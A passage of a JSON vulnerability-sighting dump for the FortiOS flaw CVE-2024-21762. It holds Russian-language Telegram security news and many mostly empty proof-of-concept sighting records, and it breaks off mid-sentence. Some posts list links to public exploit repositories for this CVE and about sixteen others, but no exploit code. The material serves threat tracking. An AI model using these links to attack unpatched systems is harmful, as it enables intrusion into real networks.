\u0413\u043e\u043d\u043a\u043e\u043d\u0433\u0430. \u041c\u043e\u0448\u0435\u043d\u043d\u0438\u043a\u0438 \u0443\u0431\u0435\u0434\u0438\u043b\u0438 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430 \u043a\u0440\u0443\u043f\u043d\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0441\u043e\u0432\u0435\u0440\u0448\u0438\u0442\u044c \u0434\u0435\u043d\u0435\u0436\u043d\u044b\u0439 \u043f\u0435\u0440\u0435\u0432\u043e\u0434 \u043d\u0430 25 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u043e\u0432 \u0434\u043e\u043b\u043b\u0430\u0440\u043e\u0432, \u0434\u043b\u044f \u0447\u0435\u0433\u043e \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043b\u0438 \u0432\u0438\u0434\u0435\u043e\u0437\u0432\u043e\u043d\u043e\u043a \u0441 \u0443\u0447\u0430\u0441\u0442\u0438\u0435\u043c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043a\u043e\u043b\u043b\u0435\u0433 \u0436\u0435\u0440\u0442\u0432\u044b, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0435\u0451 \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u043d\u0430\u0447\u0430\u043b\u044c\u043d\u0438\u043a\u0430. \u0410 \u0442\u0435\u043f\u0435\u0440\u044c \u2014 \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u044b\u0439 \u043f\u043e\u0432\u043e\u0440\u043e\u0442 \u0441\u044e\u0436\u0435\u0442\u0430 \u2014 \u0432\u0441\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u0441\u043e\u0437\u0432\u043e\u043d\u0430, \u043a\u0440\u043e\u043c\u0435 \u0436\u0435\u0440\u0442\u0432\u044b, \u0431\u044b\u043b\u0438 \u0434\u0438\u043f\u0444\u0435\u0439\u043a\u0430\u043c\u0438. \u041f\u043e\u043b\u0438\u0446\u0438\u044f \u0413\u043e\u043d\u043a\u043e\u043d\u0433\u0430 \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442, \u0447\u0442\u043e \u0443\u0436\u0435 \u0441\u043e\u0432\u0435\u0440\u0448\u0438\u043b\u0430 6 \u0430\u0440\u0435\u0441\u0442\u043e\u0432. \u0412 \u0420\u0424 \u043f\u043e\u043a\u0430 \u0442\u0430\u043a\u0438\u0445 \u0441\u043b\u0443\u0447\u0430\u0435\u0432 \u043d\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e (\u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e), \u0430 \u0432\u043e\u0442 \u0433\u043e\u043b\u043e\u0441\u043e\u0432\u044b\u0435 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u044b \u0430\u0442\u0430\u043a\u0438 \u0443\u0436\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u044b \u0426\u0435\u043d\u0442\u0440\u043e\u0431\u0430\u043d\u043a\u043e\u043c.\n\n\ud83d\udc40  \u041f\u0435\u0447\u0430\u043b\u044c\u043d\u044b\u0439 \u0438\u0442\u043e\u0433 2023 \u0433\u043e\u0434\u0430: \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Chainalysis, \u0432\u044b\u043f\u043b\u0430\u0442\u044b \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u0430\u043c ransomware \u0437\u0430 \u0433\u043e\u0434 \u043f\u0440\u0435\u0432\u044b\u0441\u0438\u043b\u0438 1 \u043c\u0438\u043b\u043b\u0438\u0430\u0440\u0434 \u0434\u043e\u043b\u043b\u0430\u0440\u043e\u0432. \u041f\u0440\u0438 \u044d\u0442\u043e \u043f\u043b\u0430\u0442\u0435\u0436\u0438 \u0431\u043e\u043b\u044c\u0448\u0435 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e \u0440\u0430\u0441\u0442\u0443\u0442 \u0432 \u043e\u0431\u0449\u0435\u0439 \u0434\u043e\u043b\u0435, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u044f, \u0447\u0442\u043e \u043a\u0438\u0431\u0435\u0440\u0431\u0430\u043d\u0434\u0438\u0442\u044b \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u043e\u0445\u043e\u0442\u0438\u0442\u044c\u0441\u044f \u0437\u0430 \u043a\u0440\u0443\u043f\u043d\u043e\u0439 \u0434\u0438\u0447\u044c\u044e.\n\n\u2328\ufe0f \u0411\u044d\u043a\u0434\u043e\u0440 \u043d\u0430 Rust, \u043a\u0440\u0435\u0430\u0442\u0438\u0432\u043d\u043e \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u044b\u0439 RustDoor, \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u041f\u041e, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0437\u0430\u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043d \u043f\u043e\u0434 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 Visual Studio. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043e\u043d \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d \u043d\u0430 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0443 macOS, \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440\u044b \u0438 ARM \u0438 Intel. \u0410\u0432\u0442\u043e\u0440\u044b \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442 \u043f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u0435 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u04212 \u0441 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u0430\u043c\u0438 ransomware  Black Basta \u0438 BlackCat.\n\n\ud83c\udd94 \u041d\u0435 APT, \u043d\u043e \u0442\u043e\u0436\u0435 \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e\n\n\ud83d\udd10 \u0412 App Store \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0436\u0438\u043b\u043e \u0438 \u0437\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435-\u043a\u043b\u043e\u043d \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 LastPass. \u041e\u0442 \u044d\u0442\u043e\u0433\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0434\u0430\u0432\u043d\u043e \u043f\u043e\u0440\u0430 \u043e\u0442\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0438\u043c\u043f\u043e\u0440\u0442\u043e\u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u043e \u0445\u0432\u0430\u043b\u0451\u043d\u0430\u044f \u0440\u0443\u0447\u043d\u0430\u044f \u043c\u043e\u0434\u0435\u0440\u0430\u0446\u0438\u044f Apple \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u0440\u0430\u0437 \u043e\u0447\u0435\u043d\u044c \u0440\u0430\u0441\u0441\u0442\u0440\u043e\u0438\u043b\u0430.\n\n\ud83d\udc40 Fortinet \u043d\u0435 \u0443\u0442\u0435\u0440\u043f\u0435\u043b\u0438 \u0434\u043e \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0432 \u043f\u044f\u0442\u043d\u0438\u0446\u0443 \u0441\u0440\u043e\u0447\u043d\u043e\u0435 \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u0435 \u043f\u0440\u043e CVE-2024-21762 (CVSS 9.6), \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 FortiOS, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0443\u044e \u043a RCE. \u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e \u0434\u043b\u044f FortiOS 6 \u0438 7 \u043b\u0438\u043d\u0435\u0439\u043a\u0438, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u043b\u044f FortiProxy 1.0-1.2. \u0415\u0441\u043b\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0435\u0433\u043e \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 \u0441\u043c\u044f\u0433\u0447\u0430\u044e\u0449\u0435\u0439 \u043c\u0435\u0440\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c SSL VPN. \u0412 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u0435 \u0435\u0441\u0442\u044c \u0442\u043e\u043d\u0438\u0437\u0438\u0440\u0443\u044e\u0449\u0438\u0439 \u043f\u043e\u0441\u0442\u0441\u043a\u0440\u0438\u043f\u0442\u0443\u043c: \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u0436\u0438\u0432\u0443\u044e.\n\n#APT #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 @\u041f2\u0422", "creation_timestamp": "2024-02-12T07:55:47.000000Z"}, {"uuid": "f7a435eb-5701-4fcc-8f8d-d5231789dcb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/ykpeRUZLemwyi60A7SwPeqgLo5uFnpPDUqsHcv9B8WdJug", "content": "", "creation_timestamp": "2024-04-15T17:14:47.000000Z"}, {"uuid": "10c78af1-37b9-4629-9672-e2c330d3048d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/Teamx1945x/4646", "content": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21762", "creation_timestamp": "2024-04-24T13:40:14.000000Z"}, {"uuid": "3473e301-0407-435a-af8d-2db70ea41814", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/_mWpeh4qdhRt3fH7JFrcbJKR-ZRXaxa315wuegc-5_9vtA", "content": "", "creation_timestamp": "2024-03-19T23:41:23.000000Z"}, {"uuid": "3166d925-b356-46ec-8838-0b5839e7947e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/LockBitChannels/119126", "content": "#exploit\nCVE-2024-20328:\nClamAV Command Injection Bug\nhttps://amitschendel.github.io/vulnerabilites/CVE-2024-20328\n\nCVE-2024-24816:\nCKEditor XSS vulnerability\nhttps://github.com/afine-com/CVE-2024-24816\n\nCVE-2023-35080:\nIvanti/Pulse VPN Client Exploit\nhttps://github.com/HopHouse/Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation\n\nCVE-2024-0811:\nChrome pageCapture.saveAsMHTML() Extension API Blocked Origin Bypass\nhttps://packetstormsecurity.com/files/177172/Chrome-chrome.pageCapture.saveAsMHTML-Extension-API-Blocked-Origin-Bypass.html\n\nCVE-2023-50387:\nKeyTrap in DNS/DNSSEC\nhttps://github.com/knqyf263/CVE-2023-50387\n\nCVE-2024-22369:\nApache Camel Unsafe Deserialization\nhttps://github.com/oscerd/CVE-2024-22369\n\nCVE-2024-1708/CVE-2024-1709:\nScreenConnect Authentication Bypass\nhttps://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass\n\nCCE-2024-21413:\nMicrosoft Outlook RCE\nhttps://github.com/Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability\n\nCVE-2024-24401:\nNagios Authenticated SQL Injection\nhttps://github.com/MAWK0235/CVE-2024-24401\n\nCVE-2024-1071:\nWordPress Ultimate Member Unauthorized Database Access/SQLi\nhttps://github.com/gbrsh/CVE-2024-1071\n\nCVE-2024-1651:\nTorrentpier RCE Exploit\nhttps://github.com/sharpicx/CVE-2024-1651-PoC\n\nCVE-2023-50386:\nApache Solr Backup/Restore APIs RCE\nhttps://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC\n\nCVE-2024-21762:\nFortiOS 6.0 - 7.4 - OoB/RCE\nhttps://github.com/c0d3b3af/CVE-2024-21762-POC\n\nCVE-2024-26521:\nCE Phoenix v1.0.x Html Injection\nhttps://github.com/hackervegas001/CVE-2024-26521\n\nCVE-2024-21672:\nConfluence Data Center/ Server RCE\nhttps://github.com/swagcrafted/CVE-2024-21672-POC\n\nCVE-2023-49109:\nRCE in Apache Dolphinscheduler\nhttps://xz.aliyun.com/t/13913?time__1311=mqmxnQ0%3D3eqQqGNDQiFbFD9Q7fCKAKx\n\nCVE-2024-21410:\nMS Exchange Privilege Escalation\nhttps://github.com/FreakyM0ndy/CVE-2024-21410-poc", "creation_timestamp": "2024-10-04T00:51:53.000000Z"}, {"uuid": "f9a9384d-6524-4335-8cb0-7675c04125c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/D8W3_uGtnju_V_7MKZgkxB4ri6vILXhIFCxK4k3uq2QFFg", "content": "", "creation_timestamp": "2024-04-15T17:50:05.000000Z"}, {"uuid": "1dd1a75a-b21e-404f-af16-aea3e7f74c03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/CRo72oop6ZwQnESqwzNS9o-UvXAtRRZBbTaMpkpQIbIEQGCv", "content": "", "creation_timestamp": "2025-01-19T09:05:11.000000Z"}, {"uuid": "5ada80a3-2d49-4006-a7f1-810153a46b6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "Telegram/E3iST3lZwZOutaoSgFfuoZ6eFjpwUIDeSKbyxLV2xONR5Q", "content": "", "creation_timestamp": "2024-05-02T02:23:05.000000Z"}, {"uuid": "820e00e3-b50c-4d17-8e9f-9fb45e78c410", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/kARn7A70REOww4N5d-XPJp1wZGcd_PF77QuBMP-kGfB_gg", "content": "", "creation_timestamp": "2024-04-28T04:00:50.000000Z"}, {"uuid": "58109168-8ed2-420f-b64d-fae34dab27b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/V1VUnV7rs7gBAtSdtSG9YU8DOLHIzu1kUZjtLh94w5_yW5C9", "content": "", "creation_timestamp": "2024-12-22T22:15:30.000000Z"}, {"uuid": "cbfcc050-b143-4412-9f1b-219a2e37ce52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/1o3RyjbxkBAdqVV1IakPcUVDj3AIfLmG662gmZzR_AzpiWSm", "content": "", "creation_timestamp": "2025-01-20T11:03:21.000000Z"}, {"uuid": "3dd5f469-7e72-45f4-9131-0526de6b8ca2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/arvinclub1/1089", "content": "\ud83d\udc49 CVE-2024-21762 : Fortinet FortiOS & FortiProxy 'sslvpnd' - Unauthenticated Remote Code Execution (OOB)\n\nPOC : https://github.com/h4x0r-dz/CVE-2024-21762\n\nVersion : https://www.fortiguard.com/psirt/FG-IR-24-015\n\nBlog / POC : https://www.assetnote.io/resources/research/two-bytes-is-plenty-fortigate-rce-with-cve-2024-21762", "creation_timestamp": "2024-03-19T17:41:23.000000Z"}, {"uuid": "89036838-a07b-4b45-a415-3591b6be3619", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/sSOYy9sa0Jc9yTev23pVTCXx5ZwCCV54W3-F49CmFMjcWAGd", "content": "", "creation_timestamp": "2025-01-19T10:45:19.000000Z"}, {"uuid": "7a115c80-e47d-46eb-bab3-bc25dacbddfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/m_uXFR_n3tw3cdqXp4eNTFp75GNkXoZP5JCdghj_BLdvWjAh", "content": "", "creation_timestamp": "2025-01-19T10:54:11.000000Z"}, {"uuid": "f4c2f6df-a756-4577-89a9-934c93d4622d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/UrNq84zyBC1oMAufBesPTpXAbedIsqXaSNJFq3mfmDUScAM", "content": "", "creation_timestamp": "2024-10-04T00:51:11.000000Z"}, {"uuid": "9afc7247-7a86-4a55-957d-a30a2c918bfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "Telegram/yoNNgIU2JU4zwFL5vXqVgP00V9P0beeHjRLaro8CHcaWRn8", "content": "", "creation_timestamp": "2024-05-02T02:23:04.000000Z"}, {"uuid": "27fa99a3-61ef-422c-8518-cdab7e38381f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/ka4r4qYwVxdRippikx-xG_NK80fkxKAztB3G3QTOK2mvQaw", "content": "", "creation_timestamp": "2024-04-28T04:00:50.000000Z"}, {"uuid": "b0649ad6-11eb-4c04-bb56-e00765d12279", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/h3UUTePjSj0q0uOcecYAXI6NAHvnnuBEfHulQcDcnroUwhg", "content": "", "creation_timestamp": "2024-04-23T19:55:01.000000Z"}, {"uuid": "8a76e0a0-d5df-40f1-81e9-3359a05d35de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/efGp9zo_iOGcB8zbyhMvz6dkO2aI66dF7JZBEW7vom3PZVg", "content": "", "creation_timestamp": "2024-04-22T05:57:59.000000Z"}, {"uuid": "0150dee4-684f-4286-b613-fae64934af57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/Nh605iaoI_KymP2vWUXAJdPQp6OoQBH6YyUuSuUIm0bIL3Q", "content": "", "creation_timestamp": "2024-04-18T04:12:16.000000Z"}, {"uuid": "c68f69aa-024f-4f0b-b482-f43c7da17d45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/1yNdYtjM167PWJ8z4QCuhWfayRW6CDLYSnp7378ajV5EDt8", "content": "", "creation_timestamp": "2024-10-04T00:51:08.000000Z"}, {"uuid": "73fac9ab-b05e-4217-8d6d-84fc857e0223", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/MI65lLGsaGTIv40PK1J154YyMiL63QZNJWuw9XlT_YRsFb40", "content": "", "creation_timestamp": "2025-01-19T09:05:12.000000Z"}, {"uuid": "64ac78ce-5ca3-4734-a4db-ca882c93b1b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/OIy-vi5ELr4cctl8ownkSK8SkQmdcofc4nGKbyP-zK6wBJzg", "content": "", "creation_timestamp": "2025-01-19T10:45:24.000000Z"}, {"uuid": "7c221c36-a7e4-4bdf-af8c-4ad1b13a36dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/PfifvZz7tMW-Pq-u9dIIWpX49EGHHaNBJSKvwqdUIESB65tP", "content": "", "creation_timestamp": "2025-01-19T10:54:13.000000Z"}, {"uuid": "1cb51ff4-3d93-4899-b29e-e6e3d620cfb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/1Z5p7xYqKVRAHiS5stM6LcQjCrKKZtV6q5K3lriQD01vETjY", "content": "", "creation_timestamp": "2025-01-20T11:03:16.000000Z"}, {"uuid": "2568e298-b83c-4a15-b511-077232b16b5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "exploited", "source": "Telegram/6chl7ray-d8-43iPFGwZzdMGKnvnBviHG72_hPduSnm3Mw", "content": "", "creation_timestamp": "2024-02-09T07:19:01.000000Z"}, {"uuid": "6a6918d0-d93d-4c59-851a-2b82a21cd40b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/7b0KDMH2WfquipCst9Tv71iesbtnEU4bQJg16OEgDf9nbvsj", "content": "", "creation_timestamp": "2024-12-22T22:15:27.000000Z"}, {"uuid": "be627037-0579-4ce8-b0fa-8deb0833e2e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "Telegram/dtIe1Va1bhf-Dx_dB3ROG2j7z94vgRQ-g5x8umtx3v695g", "content": "", "creation_timestamp": "2025-04-11T21:56:56.000000Z"}, {"uuid": "1d78fee6-aa0b-4d85-b898-95614f3059de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "Telegram/MJSg8Sv1s6244nb3DVYWZm8Rju6lGyMlDeVM6a0Y3fvmnw", "content": "", "creation_timestamp": "2024-05-02T02:23:05.000000Z"}, {"uuid": "7baf714e-db74-4187-92ac-99f59e45d582", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "https://t.me/ExploitationnDiscuss/8911", "content": "https://raw.githubusercontent.com/h4x0r-dz/CVE-2024-21762/main/poc.py", "creation_timestamp": "2024-04-28T07:42:38.000000Z"}, {"uuid": "f6bf91b7-5a64-4540-bf6e-e7fb94334164", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/-GWNu9oh8M0UuUf_L_WgDrtaQ-7cnjKMfKdIvG3Z_Lg7Xg", "content": "", "creation_timestamp": "2024-04-22T05:57:59.000000Z"}, {"uuid": "dbcabfa4-3d53-47f8-8d02-9d9e6a469e8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/IX1p5-659ElegIMhOoje3NXNFlGoYhM_7-_z1cIvWnE73A", "content": "", "creation_timestamp": "2024-04-28T04:00:50.000000Z"}, {"uuid": "15ea74cc-99a5-4def-8075-4839a21f3797", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "published-proof-of-concept", "source": "Telegram/CLsaOZ8OXEGj3hNSeKF5nd3qJgUkJB15UJN-ZhcYCzHrbg", "content": "", "creation_timestamp": "2024-04-18T04:12:16.000000Z"}, {"uuid": "6570659a-fb52-42b0-af88-7050c481a68d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-21762", "type": "seen", "source": "https://t.me/Web_Security_Live/90", "content": "\ud83d\udfe5 \u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0433\u0440\u043e\u0436\u0430\u0435\u0442 150 \u0442\u044b\u0441\u044f\u0447\u0430\u043c \u0448\u043b\u044e\u0437\u043e\u0432 Fortinet FortiOS \u0438 FortiProxy\n\n \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-21762, \u0438\u043c\u0435\u044e\u0449\u0430\u044f \u0441\u0442\u0430\u0442\u0443\u0441 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439, \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u043e\u043f\u0430\u0441\u043d\u0430 \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u0447\u0435\u043c \u0434\u043b\u044f 150 \u0442\u044b\u0441\u044f\u0447 \u0448\u043b\u044e\u0437\u043e\u0432 Fortinet FortiOS \u0438 FortiProxy. \u041a \u0442\u0430\u043a\u043e\u043c\u0443 \u0432\u044b\u0432\u043e\u0434\u0443 \u043f\u0440\u0438\u0448\u043b\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 